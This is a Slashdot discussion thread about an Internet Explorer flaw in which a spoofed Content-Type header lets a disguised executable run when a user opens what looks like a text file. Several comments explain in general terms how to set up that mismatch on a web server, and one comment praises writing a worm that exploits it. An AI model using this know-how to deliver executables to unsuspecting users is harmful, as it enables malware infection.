      4) Ignore the linked article, and claim something stupid. In this case that MS isn't in a hurry to release a patch when in fact they have been testing a patch.
      It's been a month, without a work around or even a warning. I don't know if they're in a hurry but it's certainly taking a while.
    42. Re:Overreaction from Michael. by Oily+Tuna · · Score: 1

      If someone hacks into the server where my stock portfolio or my bank account details are then I've got more to worry about than someone getting a directory listing of c:\Pr0n

      --
      Mmmmmmm ... sushi.
    43. Re:Overreaction from Michael. by geekoid · · Score: 2

      I do program, and where I come from, design flaws usually count as bugs.
      if you believe this, then where you come from is missing a village idiot.

      A bug is an error not intended by design.
      a bad design is a bad design.

      2 different things.

      both bad, and I do agree that a bad design is difficult to "fix" technicall its impossible to fix, but you can hack the hell out of it to fix a problem. or rewrite.

      --
      The Kruger Dunning explains most post on /. http://en.wikipedia.org/wiki/Dunning%E2%80%93Kruger_effect
  22. Does anyone at /. read the articles in the post? by Anonymous Coward · · Score: 1, Insightful

    "The patch for Internet Explorer (IE) is currently in testing and could be released soon"

    Second damned sentence. No wonder I don't come here anymore.

  23. Another security hole in IE? I'm all patched out.. :(

    --


  24. Guess What? by MeowMeow+Jones · · Score: 2, Interesting

    Content-type is an HTTP header. To recieve this info must be transmitted via HTTP. You may have noticed that Netscape (and even Lynx, and yes even on Linux) have no problem displaying local html/ pdf/ whatever files without recieving an HTTP transmission, and thus no Content-type header.

    Yep, they do the same thing and look at the file extention to determine how to render files.

    I'm not saying there's not a bug, or it's not severe, but examining the file extention to determine type is hardly an IE-only thing.

    --

    Trolls throughout history:
    Jonathan Swift

    1. Re:Guess What? by stew77 · · Score: 1

      I think on some browsers you can still edit the extention->file type association, so that they use only the mime type. However, you'll then have to deal with the problem that some filetypes are not identified correctly due to lazy webserver admins.
      Hm..yes, I just checked: I can remove the .exe extention from Opera as valid file type for executables. Besides, the security flaw is not a wrong identification but the double identification which lets the exploit bypass the save/execute dialog in IE.

    2. Re:Guess What? by owsla · · Score: 1

      Actually, try renaming a local .jpg file to something silly like .foo and then opening it. It works under Mozilla/Linux and clearly it didn't rely on the extension.

    3. Re:Guess What? by dbarclay10 · · Score: 2

      Yes, you're right, for local browing, most browsers on most platforms rely on file extensions, not on a Content-Type header.

      Still, what's the relevance? This story isn't about how IE is a total piece of crap because it uses local file extensions to figure out what to do with them. It's a story about how a) this bug has existed for almost a *month*, and absolutely every computer running any of the affected versions(and we're talking, what, three, four years worth of affected versions) are totally WIDE OPEN. And HAVE BEEN FOR A REALLY, REALLY LONG TIME :)

      And, b) these are *remote* files they're dealing with, not local files. So, yeah, *nix browsers and pretty much every other browser looks at file extension on local files, but relies on Content-Type headers for remote files. Well, here's news; IE will use file extension on *remote* files :) Anyways, those browsers are smart enough not to execute untrusted code, even if they do run across it(JavaScript, Java, whatever). They do what's called "sandboxing". Something that is /sorely/ lacking from MS's vocabulary.

      --

      Barclay family motto:
      Aut agere aut mori.
      (Either action or death.)
    4. Re:Guess What? by dangermouse · · Score: 2
      Yes, but those browsers go only by Content-type when receiving an HTTP transmission, and use extension otherwise (or /etc/magic, possibly).

      The flaw here seems to be that you can trick IE into behaving as if it's looking at a local file when it is in fact looking at a file it just received via HTTP.

      You send it something it initially thinks is "HTML", thereby bypassing its warnings about executable files, but later decides is executable...and therefore runs.

      At least, that's what I gleaned from the article... it was a bit sparse.

    5. Re:Guess What? by cleancut · · Score: 1

      Unix based programs do not simply look at the extension to determine what to do with the file. Instead, they tend to use tools like the magic database (run "man 5 magic" to learn more) to determine what type of data a given file contains. AFAIK, no major *nix tools are programmed in such a lame fashion as to simply look at file extensions.

    6. Re:Guess What? by Elwood+P+Dowd · · Score: 2

      I thought that the accusation was that they use one method to show the user the name and they use the other method to actually operate on the file. If they use the file extention to determine file type and also use the file extension to decide what to do with the file, then there is no security risk.

      If any other browsers are using one method for identification to the user and another method for execution, then it's not IE-only.

      --

      There are no trails. There are no trees out here.
    7. Re:Guess What? by monkeydo · · Score: 2, Interesting

      It's even funnier than that.

      The only way IE could be vulnerable to this kind of exploit is if it relied on the content-type in the header and _ignored_ the file extension. The whole point of the "vulnerablity" is that IE doesn't display the _actual_ extension, but instead it displays what it is told by the MIME header.

      Si if Netscape et al are not affected by this vulnerability it is precisly because they are doing what Michael is accusing Microsoft of doing: ignoring the content-type all together and relying on the file extension.

      --
      Si vis pacem, para bellum
      The only thing more annoying than a Libertarian is an (un|mis)informed Libertarian
    8. Re:Guess What? by mrseth · · Score: 4, Insightful

      Not exactly. Linux and Unix determine file type by magic number. Try renaming a postscript file (or whatever) as foo and type

      file foo

      and you'll see that it still returns the correct file type.

    9. Re:Guess What? by Anonymous Coward · · Score: 0

      Totally.

      Listen, this "Let's attack anything Microsoft" thing is just lame. It was fun when slashdot was a tiny site, but as with most web communities, /. has morphed due to it's community and this kind of blatant picking on microsoft for every possible thing just doesn't fly anymore.

      Sure, this is a security hole. And yes microsoft needs to patch it. Does this make them the antichrist? I think not.

      I'm not saying this isn't newsworthy, but there are dozens of bugs like this reported every month in windows and in linux - this kind of biased reporting just looks childish at this point - the "evil" of these kinds of things is always totally blown out of proportion because the name Microsoft is involved. Bleh.

    10. Re:Guess What? by spongman · · Score: 3, Insightful

      Sure, but browsers don't use this mechanism to determin file type in the absence of a mime-type header. They all use a mapping from extensions to applications. Mozilla's is in the option dialog (I'm not sure where it's persisted), and IE's is in the registry.

    11. Re:Guess What? by mindstrm · · Score: 2

      Err.. no...
      'file' determines the file type by magic number.. not linux.

    12. Re:Guess What? by arkanes · · Score: 1

      I managed to break a win95 machine using an old version of Netscape (4.x?) once, by doing something stupid at the install window for a program i was downloading - I managed to redefine the the file assosciation for .exe files. Was a huge pain in the butt (can't fire up regedit.exe, etc, etc....)

    13. Re:Guess What? by Anonymous Coward · · Score: 0
      Change the magic number definitions. Then 'file' will tell you whatever it wants.


      /usr/share/magic

  25. Deja Vu by JWhiton · · Score: 1
    This reminds me of a security hole in Passport that was also caused by Internet Explorer picking strange ways to handle data.

    This is why I started using Mozilla.

  26. Re:Now that this particular cat is out of the bag. by KingAdrock · · Score: 1

    Microsoft can't be to blame for this... Would you blame Linus for someone running a Kernel from 4 years ago, that might have a security hole in it?

  27. Let me get out my watch by Violet+Null · · Score: 1, Redundant

    And time exactly how long it takes for someone to make a virus out of this li'l puppy.

    The best(?) part being that, after years of telling users that to get a virus via Outlook they had to click the attachment, it seems to be possible to write an executable-disguised-as-HTML message that will automatically execute, since there's no option to turn off HTML viewing in Outlook.

    1. Re:Let me get out my watch by jroysdon · · Score: 1

      No-HTML Outlook Plug-In. No fix for Outlook Express yet.

    2. Re:Let me get out my watch by ASIO · · Score: 1

      Research KAKworm sometime (correct me on the name of it people), It's been automatically infecting for at least a year that I know of, with just a preview :)

      --
      On the other hand, you have fingers :)
    3. Re:Let me get out my watch by Violet+Null · · Score: 2

      Didn't know about that. Interesting. Thanks.

  28. Re:Now that this particular cat is out of the bag. by RedWolves2 · · Score: 2, Informative

    You ask if there is any toggle in IE? Did you read the article because it explained in there that there is indeed a toggle you can flip. Basically you have to turn off file downloads to protect yourself.

  29. I teach classes to some IT folk by LauraLolly · · Score: 3, Interesting
    I have handed out sheets discussing similar vulnerabilities to corporate IT folk. Then I have asked them what they plan on doing.
    1. Wait for the patch?
    2. Switch OS?
    3. Switch browsers?
    4. Clean up the mess?

    Most end up knowing that they will clean up the mess, because "The top guys like Microsoft so much - it has so many features." Nobody is willing to do an honest cost accounting for the top guys.

    Until the collective IT folk give an honest accounting of how much MS is really costing them, there will not be a switch away from MS. The moment they do - stampede!

    1. Re:I teach classes to some IT folk by silicon_synapse · · Score: 1

      An honest cost accounting is very difficult to do though. The costs are so varied and spread over a long period of time that an acurate costing is mere guesswork. The top guys want to know what it costs NOW. It's your job to make it just work automagically.

    2. Re:I teach classes to some IT folk by rho · · Score: 2, Offtopic

      Good luck convincing IT to do an honest cost analysis. The collective IT folk use Microsoft software to feather their own nests.

      Why go with Unix (where one $125,000/year guy runs 80 machines) or Mac (where each workstation is pretty much administered by the person using it), when you can run a Little Empire with 10-20 $40,000/year MCSEs keeping 100 stations and 10 servers up by ctrl-alt-del'ing every 54 days or so.

      --
      Potato chips are a by-yourself food.
    3. Re:I teach classes to some IT folk by Pi3.142 · · Score: 0

      A guestimate of loss in the recent Goner Virus at one of my consulting company literally cost more than a million $. The whole organization network was clogged for more than 6 hours. Atleast in my discussion ( heated debate ) with one of our Winblows admin made him convince that there are problems with M$ bloatware. phew - some brainwashing.!!

    4. Re:I teach classes to some IT folk by WhyPanic · · Score: 1

      I don't know where you work, but in the place I work right now we have 5 people making around 50k a year (or less) administering over 50 Windows 2000 servers and over 250 client machines in two (non-adjacent) states. On the other end, my previous employment I was part of another 5 person team that managed around 20 Solaris and 10 NT servers each team member making over 60 grand a year. In my own personal experiences (not yours), one guy NEVER runs 80 machines. I'm betting that these places with the "Little Empire" aren't too financially solvent either. Don't you think that was a slight exaggeration?

      --
      ...see you auntie
    5. Re:I teach classes to some IT folk by Anonymous Coward · · Score: 0

      Goner is like the 89th "ILUVYOU"-type virus in a row. Any company that repeatedly bends over and loses a million dollars every couple months problably deserves it.

  30. Exploits using ordinary HTTP code? by AMuse · · Score: 2

    telnet server.foo.com 80

    Connected to server.foo.com.

    Escape character is '^]'.

    /HTTP /GET file-to-have-your-advice.

  31. Undocumented bugs by os2fan · · Score: 2
    Gee. it's not only that. Everything in Windows is so deeply threaded that it is possible for a virus to lodge itself in the start-up sequence anywhere, and go unfindable.

    For example, there are seven or eight differnt start-up objects in Windows 9x:

    • msdos.sys [hidden file]
    • config.sys
    • autoexec.bat
    • registry [many different keys]
    • system.ini
    • %windir%\system\vmm\*.* [just sucked up whole]
    • startup folders [yes, you can have startup folders nested.
    What a program is to do with a file is done in three different ways as well.

    It's little wonder that the thing is open to attack. You can't hunt it down unless you pretty much hack it, and follow their goofy retro thing with the 64-bit sequence: {01.22.23....}

    Lack of forethought, I imagine.

    --
    OS/2 - because choice is a terrible thing to waste.
    1. Re:Undocumented bugs by Anonymous Coward · · Score: 0

      Don't forget about the little known c:\windows\winstart.bat that executes after the network comes up but before the gui.
      Then theres the wininit files that Windows uses when it needs to replace files that were in use when you installed a program.

    2. Re:Undocumented bugs by Anonymous Coward · · Score: 0

      why isnt this modded as redundant?

      windows has no more autoexec stuff than a unix type system - the point is that if anyone has superuser privs (which is anyone in 9x) they can do what they like including setting files to auto execute on bootup etc. how about rc.d scripts? .login etc scripts? crontab? there are just as many was to setup things starting automatically on nix.

    3. Re:Undocumented bugs by Anonymous Coward · · Score: 0
      For example, there are seven or eight differnt start-up objects in Windows 9x:
      msdos.sys [hidden file]
      config.sys
      autoexec.bat
      registry [many different keys]
      system.ini
      %windir%\system\vmm\*.* [just sucked up whole]
      startup folders [yes, you can have startup folders nested.

      You can see almost all of these from MSCONFIG, though. Whether a startup program runs from a registry key, an INI file, or the StartUp folder, it will show up in MSCONFIG's Startup tab.
    4. Re:Undocumented bugs by Anonymous Coward · · Score: 0

      why isnt this modded as redundant?

      Probably because it's not redundant.

      windows has no more autoexec stuff than a unix type system

      Plain false.

      autoexec stuff in Unix falls in two locations:
      init, and rc.d

      rc.d scripts? .login etc scripts? crontab?

      Login scripts and crontabs aren't autoexec (as in - they don't run when the machine starts.)

      This is two, compared to 8(!) listed for windows (there are probably others) in this thread.

      Perhaps you haven't completed second grade mathematics, but last time I checked, two is definitely less than eight.

  32. Re:Now that this particular cat is out of the bag. by juju2112 · · Score: 1

    Well, you can just do what I do: Browse with Mozilla.

  33. Maybe Im missing something here... by night_flyer · · Score: 2, Insightful

    if you try and open an .exe that is named as a text file, the file associations within windows will launch notepad (or associated program) and NOT fire off the renamed application, ditto with .html and .wav files (or any other associated file), are they sure they arent talking about a file named something.txt.exe?

    --


    Thanks to file sharing, I purchase more CDs
    Thanks to the RIAA, I buy them used...
    1. Re:Maybe Im missing something here... by OblongPlatypus · · Score: 2

      Yes, I think they're sure. What they're talking about is a file named something.txt but which is transmitted accompanied by a "Content-Type: application/octet-stream" header, or equivalent.

      --
      -- If no truths are spoken then no lies can hide --
    2. Re:Maybe Im missing something here... by Violet+Null · · Score: 2

      The bug works something like this.

      When you download something from a webpage (anything: HTML file, WAV file, TXT file, etc), you get a bunch of headers before the download. The browsers hide this from you, though most have options to see this information (exception, I believe, IE). It's pretty standard stuff (server type, info about caching, etc), but one of the header bits is 'content-type'

      So, anyways, if you can change the content-type for a file type (trivial to do in Apache in the conf/mime.types file), you can get IE to download the file without regarding it as what it really is. Eg, even if the file is called 'goner.exe', if your web server swears the content-type is 'text/html', then IE won't pop up the application download box (the one that asks if you want to save or run), even though (and this is the important bit) the file is called 'goner.exe'

      Now, this would be fine if it was consistent. However, we all know that explorer (not IE) runs off of file extensions, and the problem comes into focus.

    3. Re:Maybe Im missing something here... by Anonymous Coward · · Score: 0

      If the web server says
      virus.exe is text/plain
      then IE will drop all its security checks
      then the exe extension will take over and execute.

    4. Re:Maybe Im missing something here... by OblongPlatypus · · Score: 2

      No, you have it the wrong way around. The file can be called 'something.txt', but the web server swears the content type is 'application/octet-stream' (in other words, an executable), so IE will execute it. It *will* ask you first, but it will use the word "open" instead of "execute", and since the file looks like a text file pretty much anyone could be fooled.

      --
      -- If no truths are spoken then no lies can hide --
    5. Re:Maybe Im missing something here... by Anonymous Coward · · Score: 0

      We have a winner folks! Thats the bug right there my friends....

  34. Saw this thread on bugtraq by silicon_synapse · · Score: 5, Interesting

    I watched a good bit of this thread on bugtraq (check the archives). Several people on the list attempted to reproduce the exloit as detailed by the original poster and failed. Whether that was their mistake or not is anyone's guess. I didn't try it myself. It only seamed to affect certain builds. I'm certainly not saying IE users aren't vulnerable, I'm just saying get details before making too much noise. MS won't release a fix until they're good and ready, so let's just sit on the flames a bit and try to find out what is going on in reality.

    1. Re:Saw this thread on bugtraq by jamie · · Score: 5, Informative

      The vulnerability was posted to Bugtraq on Nov. 26. One person tried to reproduce it the same day and failed. Its discoverer, Jouko Pynnonen, pointed out on bugtraq later the same day that:

      Some details needed for reproducing and exploiting the flaw were left out of my posting because there is no good workaround or a patch available, and the flaw could be quite easily used maliciously. Using those details it would be relatively easy to create a worm that infects a system when a user "opens" a plain text file from an infected website, for instance. For the same reason there wasn't any test page URL included in my posting. That, and technical details will be published later.

      Considering Microsoft's obstructionist response ("it's not a vulnerability, we'll fix it when we fix it, stop asking questions"), Jouko has been very kind not to publish any additional information about his discovery.

      Nevertheless, other people tried to reproduce the exploit and succeeded. Jonathan G. Lampe posted on Nov. 29:

      I have confirmed Jouko Pynnonen's and StatiC's findings that IE 5.5 sp 2 allows executables to run as soon as a user has elected to open what appears to be a normally harmless ".txt" file. (IE 5.5 trusts the filename provided in the link over the filename suggested by the header's filename tag and/or the use of an "application/octet-stream" content type.)

      Here is the ASP equivalent code to StatiC's php tidbit...

      I'd say the odds are pretty good that this is already being exploited in the wild.

      There was some discussion of whether IE6 was vulnerable in the same way as IE5; the published exploit didn't seem to work on IE6. Jouko had originally commented that "Internet Explorer 6 is exploitable in a slightly different way, but the effect is the same."

    2. Re:Saw this thread on bugtraq by silicon_synapse · · Score: 1

      Perhaps I should have read the archive myself before posting. I didn't watch the entire discussion. You appear to be right though.

    3. Re:Saw this thread on bugtraq by Anonymous Coward · · Score: 0

      MS won't release a fix until they're good and ready, so let's just sit on the flames a bit and try to find out what is going on in reality.

      Hi, you must not be paying attention. This is exactly the problem with microsoft!!!

    4. Re:Saw this thread on bugtraq by Zillatron · · Score: 2, Insightful
      There was some discussion of whether IE6 was vulnerable in the same way as IE5; the published exploit didn't seem to work on IE6.
      OK let me pitch out some paranoid forced-update conspiricy theory:
      (1) The exploit may work in IE5.5sp2 but not in IE6
      (2) IE6 won't install on Win95
      (3) Win95 became an unsupported product within the last month.

      Is the message I'm supposed to get out of this that I must upgrade all the Win95 machines I might contact in order to keep them safe?

    5. Re:Saw this thread on bugtraq by Stauf · · Score: 2, Interesting

      MS needs to review their policy, as so many agree. With a scenario like this, where no hard details are given beyond a general overview and theory, we've eliminated a vast majority of copy&paste script kiddies and other clueless individuals.

      And even if a reasonably skilled individual came across something like this, they'd still have to put in a reasonable amount of effort to figure it out for themselves, and really, how many skilled hackers are going to devote their time to writing viruses and such.

      I realise there are exceptions, but surely this is better then the fabled 'security through obscurity' approach.

    6. Re:Saw this thread on bugtraq by Sux2BU · · Score: 2, Informative
    7. Re:Saw this thread on bugtraq by ethereal · · Score: 1

      That's only if you didn't already upgrade to play EverCrack :)

      --

      Your right to not believe: Americans United for Separation of Church and

    8. Re:Saw this thread on bugtraq by erroneus · · Score: 2

      Now that's just "interesting."

      First, I hear countless arguments that it's "irresponsible" to release exploit information -- details or utilities to test [exploit] a given vulnerability.

      I see it as proof of concept code, others see it as a tool for destruction. It's a ridiculous argument that people compare with cars and other common "tools and devices" that could be used for malicious purposes as well... anyway... blah.

      As I was saying, people say it's irresponsible to publish the information and yet people also acknowledge that it often takes "proding" to get the corporate giants to move on any given problem. (I'm not singling Microsoft out on this either... other companies and developers drag their heels on such fixes too. However, when Microsoft leave a hole open, it affect people on a much larger scale -- there is a responsibility in being a monopoly that they are still not living up to.)

      "So let's just sit on the flames a bit..." ?? Are you crazy? Man... that really burns my ass...

    9. Re:Saw this thread on bugtraq by robinjo · · Score: 1, Troll

      (4) Uninstall IE
      (5) Install Opera, Netscape or Mozilla

    10. Re:Saw this thread on bugtraq by rseuhs · · Score: 1
      (1) The exploit may work in IE5.5sp2 but not in IE6 (2) IE6 won't install on Win95 (3) Win95 became an unsupported product within the last month.

      (4) Mozilla is readily available.

      Is the message I'm supposed to get out of this that I must upgrade all the Win95 machines I might contact in order to keep them safe?

      If you can avoid the "Oh my god, it's not from Microsoft" scare, then no.

    11. Re:Saw this thread on bugtraq by Anonymous Coward · · Score: 0

      Using those details it would be relatively easy to create a worm that infects a system when a user "opens" a plain text file from an infected website, for instance.

      How could you create a worm if you can't force the person to even browse to a site?

    12. Re:Saw this thread on bugtraq by archen · · Score: 1

      considering win95 doesn't know what to do with more than 64 megs of ram, and that Mozilla sucks up way more than that (typically 124 Megs in memory on W2k), you'd be much better off with Opera

    13. Re:Saw this thread on bugtraq by DNAGuy · · Score: 2, Informative

      While they don't give specifics on which extension/content type combo exhibits the behaviour, I don't believe it would be too difficult to test. I remember reading an old MSDN article explaining how to spoof mime types to force IE to render your content using an unexpected application.

      At any rate, here is an article explaining the tests IE uses to determine the mime type. Furthermore, one can manipulate the mime type reported by an IIS server simply by changing the text listed in the Folder Options > File Types property page in Explorer on the web server.

      --

      BRENT ROCKWOOD, EST'd 1975

    14. Re:Saw this thread on bugtraq by Zaak · · Score: 2, Interesting

      That's actually not true. Windows 95 supports as much RAM as your system can use. The rumor that it only supports 64M got started because many machines that ran win95 had the Intel TX chipset on the motherboard, and it couldn't cache more than the first 64M of RAM. Since win95 allocates memory from the top down, having more than 64M means that the slow, uncached memory gets used first. And since common software at that time didn't usually use more than 64M of memory, having 128M would actually make nearly all of your memory accesses uncached.
      So, the problem was actually that Intel cut corners when making the TX chipset (possibly reducing the size of the tag ram to cut costs) and win95's behavior, though not a problem on a properly designed computer, reacted badly with the low cost hardware at that time.

    15. Re:Saw this thread on bugtraq by Steveftoth · · Score: 2

      I know you are trolling, but in order to use the internet I have to use IE now. I've been to multiple sites that just simply don't work when using mozilla. Thanks to MSes non-standard javascript, popups don't work and nothing is ok with the world. There's not even an error message sometimes. If I used linux all the time I'd be screwed.

    16. Re:Saw this thread on bugtraq by Anonymous Coward · · Score: 0

      Troll? This seems like the only way to secure a win95 machine to me. Personally I never run IE anymore, don't trust it. Mozilla might not be that much more secure (although I'm sure it is, since it doesn't hook in with the os as much), but at least less people use it so you aren't as "vulnerable" and less people have actually found security problems and if they do get found, it's open source, so they get fixed, fast.

    17. Re:Saw this thread on bugtraq by Anonymous Coward · · Score: 0

      Windows 95 supports as much RAM as your system can use.

      Not true. Win 9x/ME craps itself at around 512 MB, independant of hardware (with RAM so cheap, people actually have this problem).

      There's also the real question if an OS which was designed and tested on 8 to 64MB machines really works well above that. I've heard that 95 starts to lose performance past 128MB or so, although that's hearsay.

    18. Re:Saw this thread on bugtraq by robinjo · · Score: 2

      I have news for you. You really don't need IE in order to use the internet. I've never trusted IE enough to use it.

      Mozilla nightly builds have worked just fine for more than a year for me. Before that I only used Netscape Communicator.

    19. Re:Saw this thread on bugtraq by Anonymous Coward · · Score: 0

      Hmm.. sounds like Jouko Pynnonen is engaging in the dreaded "security through obscurity" as well...

    20. Re:Saw this thread on bugtraq by Stauf · · Score: 1

      Then all is lost :)

    21. Re:Saw this thread on bugtraq by steffl · · Score: 1

      "...Jouko has been very kind not to publish any additional information..."

      IMO he should and anybody who writes malicious warm that exploits it should get a medal. Stupidity SHOULD be painful.

      erik

      --
      ...all excited, don't know why...
    22. Re:Saw this thread on bugtraq by julesh · · Score: 1

      Several people on the list attempted to reproduce the exloit as detailed by the original poster and failed. Whether that was their mistake or not is anyone's guess


      Well, I for one did try. The original discussion sounded intriguing, and the unusual lack of detail for a bugtraq post made me take note. I'm not a security researcher, and don't claim to know much about internet security - just the basics that you need to know in order to write web applications, which is my job. Exploiting your average bug is way beyond me (I wouldn't know where to start with a buffer overflow, and I don't even understand how format string bugs work), but I got this one down in 5 minutes. It's a simple combination of factors.


      What I'm saying, basically, is that if I can do it, so can a lot of other people. It's also in an area of IE that many people have known for a long time is very flaky, so I guess that some people have known about this hole for a very long time, because a lot of people go looking for IE holes, and if you know how to do it they can be easy to find.

  35. Use a filtering proxy by Anonymous Coward · · Score: 0

    It really isn't that hard to fix...

  36. Nothing new can be said by akiaki007 · · Score: 1

    Honestly. No one here can really say anything new or relavant at this point. This story has been published hundreds of times, just with a different headline.

    Now, what should really happen, is DoJ and BBB attack MS for malpractice. Purposefully creating vulnerable systems and products which thereby require updrades and costly procedures.

    These people creating all these hacks and such for IE is a good thing because it makes IE better (hey, look how many people use that browser), but what really needs to happen is create a working browser with real software issues...not stupid security holes that can be easily avoided (and should have been).

    They should be creating something that Joe Shmoe can easily program for in XML to change the way it looks. They should be creating something where I can go to a web-site without having to worry about catching a random virus. Perhaps this will add actual value to their product...rather than the forced value (since it HAS to be installed on all Windows machines).

    --
    "Time is long and life is short, so begin to live while you still can." -EV
  37. Unsafe at any speedy by famazza · · Score: 3, Insightful

    This sounds to me just like the GM/Ford cases at the 60's about negleting consumers. Isn't time to DOJ put a period on all these things?

    First that stupidity of Nimda IIS bug, that can't be fixed until next IIS release. And now this Security through obscurity crap?

    Now I want to ask. "Where will M$ take us". I know where I want to go, but what about them?

    --

    -=-=-=-=
    I know life isn't fair, but why can't it ever be un-fair in MY favor!?
    1. Re:Unsafe at any speedy by SkepTech · · Score: 0

      This sounds to me just like the GM/Ford cases at the 60's about negleting consumers. Isn't time to DOJ put a period on all these things?

      Actually, in the instances you use as an example it was Honda, Toyota, etc. who 'put a period on all these things.'

      So there you have it. Step up to the plate, competitors.

  38. Why this is'nt MS's responsibility by interstellar_donkey · · Score: 2, Insightful

    Microsoft does it's best (or worst) to provide something. But, heck, it's FREE. IE costs us nothing.

    What I DO pay for is my virus scan. I'd like to know that if something gets through and hurts my security, the virus scanning software would catch it.

    I wish people would stop getting mad at people for providing otherwise OK software with bugs in it, when those programs are FREE, and wish people would start getting mad at the virus scan companies (who my company pays lots of money to) for not catching threats.

    --
    The Internet is generally stupid
    1. Re:Why this is'nt MS's responsibility by 90XDoubleSide · · Score: 4, Informative

      Your virus scanner will do little good when someone can cause your computer do download and run any executable the malicious website owner wants... all they need do is make your computer run a file that isn't a known virus and won't set off any of the general protection features in an antivirus program, which should still allow them to completely ravage your files.

      --
      "Reality is just a convenient measure of complexity" -Alvy Ray Smith
    2. Re:Why this is'nt MS's responsibility by mister+clark · · Score: 1

      Since when is IE free?? Hello?? How much did you pay extra to get Winbloze on your computer?? How about Office?? If Microsoft came out with IE for Linux (God help us all if that ever happens...we'll need a registry for Linux...hehe...) then it could be considered a truly free browser. But until that time you're still paying for it.

    3. Re:Why this is'nt MS's responsibility by Jay+Carlson · · Score: 2
      Microsoft does it's best (or worst) to provide something. But, heck, it's FREE. IE costs us nothing.

      Wait, I thought that Internet Explorer was an integral part of the Windows operating system, not a separate product! I paid good money for that operating system!

      (Obligatory scare quotes: I paid "good money" for that "operating system".)

    4. Re:Why this is'nt MS's responsibility by jacobito · · Score: 2

      Virus scanners aren't magical, and they cannot prevent you from running all kinds of malicious executable code. Neither can they prevent applications with remote security holes from exposing you to risk.

    5. Re:Why this is'nt MS's responsibility by nEoN+nOoDlE · · Score: 2, Funny

      well, apparently you didn't read the new EULA for IE... it turns out it isn't free, it only costs your soul.

      --
      Don't trust a bull's horn, a doberman's tooth, a runaway horse or me.
    6. Re:Why this is'nt MS's responsibility by Satai · · Score: 2

      "But, heck, it's FREE. IE costs us nothing."

      That's patently false, as evidenced by this article and the swarm of articles preceding it. IE costs "us" time, stress, and ultimately, yes, money. Because you do not pay directly does not mean that it does not cost you anything - sure, I got a "free" watch at Ward's at Christmastime a couple of years ago, but I had to buy a bunch of other crap to be eligible. IE is not "without cost," and believing that it is will only further cement the idea in your head that Microsoft is a benevolent entity seeking only to provide customers with pleasure.

      And as for the virus scan - I pay for an airbag; but I don't think it's the airbag manufacturer's fault when the engine explodes and burns me alive.

    7. Re:Why this is'nt MS's responsibility by Bodero · · Score: 2

      Then why don't the virus companies effectively block virus-like activity like this? I mean, if a virus scanner's only duty was to protect you from known viruses, it wouldn't do very well in new outbreaks. To many products' credit, they do do this.

    8. Re:Why this is'nt MS's responsibility by Supa+Mentat · · Score: 2

      Ooh, it's free yay. Guess what, _I don't fucking want it!_ It slows down my computer and no matter what I do it cannot be eliminated without Windows going with it (and no I can't get rid of Windows). Besides that, I'd put money on the chances that MS charges more for everything else that they sell to subsidize the cost of developing IE. I have a serious security flaw on my computer that is there because MS forces me to have it there. I can choose whether or not to use it but it seems an awful waste of RAM and memory to use another browser. How is this anyone's responsibility other than MS?

      --
      "A witty saying proves nothing." - Voltaire
    9. Re:Why this is'nt MS's responsibility by Bodero · · Score: 2

      So wait a minute, it needs to be released on Linux to be free? Say, for instance, nVidia releases free 3D demos, for Windows only. Are they not free because they are only on Windows? Also, IE is available on Macintosh for free. You don't need to pay for Windows to download IE. What about that?

    10. Re:Why this is'nt MS's responsibility by Bodero · · Score: 2
      That's patently false, as evidenced by this article and the swarm of articles preceding it. IE costs "us" time, stress, and ultimately, yes, money.

      By that argument, Linux isn't free either. I do buy the argument, in a basic sense, too. Both IE and Linux's face value is $0, but any time invested in it is money lost. However, it's not like you spend time with maintenance on Internet Explorer for hours on end, other than applying hotfixes every couple of months.

    11. Re:Why this is'nt MS's responsibility by Bodero · · Score: 2

      I know you're trying to use Microsoft's argument against them, but IE is free. You can get the full version for MacOS for free, and if you happen to uninstall it from Windows (it can be done), you can get a full version for free. Thus, it is completely free of charge, despite any integration arguments.

    12. Re:Why this is'nt MS's responsibility by Tachys · · Score: 2

      It's not free it is supposed to be part of their OS which costs money.

    13. Re:Why this is'nt MS's responsibility by sporty · · Score: 2

      I'm not angry at MS in this case since I'm a Mac user. (OSX Rules! ph34r.)

      From my witness of IE and Windows and what not, its free just like the veggies you ate as a kid was free for you. You were forced to take it though you hated it. Though, a lot of people using computers have figured out the IE alternatives.

      Some kids learned how to feed the veggies to the dog or hide them or what have you. But those other kids who ate them, they were forced in the sense, you will eat your veggies and I won't prepare them in any other way. Parents weren't accountable for how things are made just so long as no one dies :). Microsoft has become the 'parent' company for the childen, the users who think they can't just run away from home or what have you.

      The free you are refering to is the same free that has no primary cost. The secondary cost is that you could be hacked and have to pay for repairs or what have you when something REALLY goes wrong. If MS had more accountability.. if they were forced to atone as quickly as possible... if the user was seen more as a partner in the industry vs a simple target to sell something to, I'd believe the "free" part of IE.

      As for the virus people, intrusion doesn't always fall under the form of a virus. What if I was manually, possible but highly improbably, hand crafting binary executables. Norton/McCaffee wouldn't be able to pre-predict what my application does in a grand sense: Word Processing, calculator, screensaver... That general behavior is hard to analyze, THOUGH, some sneaky behavior is always catchable.

      --

      -
      ping -f 255.255.255.255 # if only

    14. Re:Why this is'nt MS's responsibility by Anonymous Coward · · Score: 0

      >However, it's not like you spend time with maintenance on Internet Explorer for hours on end

      I suppose you've never written a web page for a while...

    15. Re:Why this is'nt MS's responsibility by walkerp1 · · Score: 1

      I wish people would stop getting mad at people for providing otherwise OK software with bugs in it, when those programs are FREE

      FREE?!!

      Is that free as in "free space on my HD", or maybe "free from those annoying security messages", or even "clue-free?" Heh, someone paid $89 for this combination browser/OS/exploit - or are you saying you actually downloaded/installed IE ("free beta testing")?

      99.44% Sig free

    16. Re:Why this is'nt MS's responsibility by Bodero · · Score: 2

      That's not maintenance on Internet Explorer. That'd be akin to you saying that you spent a lot of time maintaining Linux just because you develop programs for it, or for any OS, for that matter. You're developing something for it, not configuring something about it. Besides, for the most part, IE is the most forgiving of browsers to write web pages for. It's older browsers you have to worry about.

    17. Re:Why this is'nt MS's responsibility by xigxag · · Score: 1

      Okay, we'll stipulate Mac IE is free, but Mac IE isn't the same beasty as Windows IE. Particularly, it isn't vulnerable to this bug we're discussing. So it's off the table. And arguing from association that Win IE is free because its Mac counterpart is free is like arguing that WordPerfect for Windows must be free because Corel gives away WP Linux.

      And the fact that you can "uninstall" IE says nothing about whether it's free or not. I can uninstall Solitaire, Calculator, and all my Windows help files too. They're not free though, they're bundled in the cost of the OS.

